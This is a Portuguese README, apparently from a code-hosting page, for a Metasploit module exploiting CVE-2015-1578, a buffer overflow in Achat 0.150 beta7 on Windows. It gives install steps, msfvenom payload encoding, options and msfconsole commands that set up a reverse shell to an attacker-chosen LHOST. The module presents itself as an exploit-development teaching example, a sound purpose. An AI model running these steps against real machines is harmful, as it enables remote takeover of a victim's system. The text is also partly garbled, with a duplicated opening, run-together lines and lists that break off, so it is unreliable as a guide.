Este é um exploit de módulo Metasploit de prova de conceito para CVE-2015-1578, uma vulnerabilidade de estouro de buffer no Achat 0.150 beta7 no Windows. A exploração leva à execução remota de código por meio de um pacote UDP forjado.
Este é um módulo do Metasploit para CVE-2015-1578, uma vulnerabilidade de estouro de buffer em Achat 0.150 beta7 no Windows. A exploração leva à execução remota de código por meio de um pacote UDP malicioso.
Este módulo foi desenvolvido para servir como um exemplo limpo, mínimo e bem estruturado de desenvolvimento de exploits para o Metasploit. Ele demonstra:
msfvenommsfvenom no seu $PATHmsfvenom para gerar payload com codificação x86/unicode_mixed e caracteres inválidos personalizados./install.sh
Em seguida, inicie o Metasploit e execute:
reload_all
use exploit/windows/yaldobaoth/achat_bof
Opções
RHOSTS – Endereço IP do alvo (obrigatório)LHOST – IP do host local para o reverse shell (obrigatório)LPORT – Porta local para o reverse shell (padrão: 4444)RPORT – Porta UDP remota no alvo (padrão: 9256)Exemplo de Uso
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
Isto irá:
LHOST:LPORT especificado